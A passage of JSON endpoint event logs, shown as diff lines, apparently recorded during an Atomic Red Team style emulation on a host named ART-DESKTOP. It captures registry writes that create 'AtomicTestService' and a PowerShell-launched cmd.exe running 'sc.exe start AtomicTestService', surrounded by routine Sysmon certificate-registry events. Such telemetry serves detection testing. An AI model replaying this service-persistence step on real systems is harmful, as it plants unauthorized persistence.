"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_value": "AtomicTestService", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Type", - "registry_value": "Type", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", - "registry_value": "Start", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ErrorControl", - "registry_value": "ErrorControl", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath", - "registry_value": "ImagePath", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ObjectName", - "registry_value": "ObjectName", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "terminate", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "image_load", - "image_name": "sc.exe", - "image_path": "C:\\Windows\\System32\\sc.exe", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "file", - "file_name": "SC.EXE-BC6DAF49.pf", - "file_path": "C:\\Windows\\Prefetch\\SC.EXE-BC6DAF49.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "file", - "file_name": "CMD.EXE-89305D47.pf", - "file_path": "C:\\Windows\\Prefetch\\CMD.EXE-89305D47.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe start AtomicTestService\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5588, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570845090000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "command_line": "sc.exe start AtomicTestService", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3448, - "ppid": 5588, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "create", - "timestamp": 131883570845200000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}", - "unique_ppid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "sc.exe", - "image_path": "C:\\Windows\\System32\\sc.exe", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - 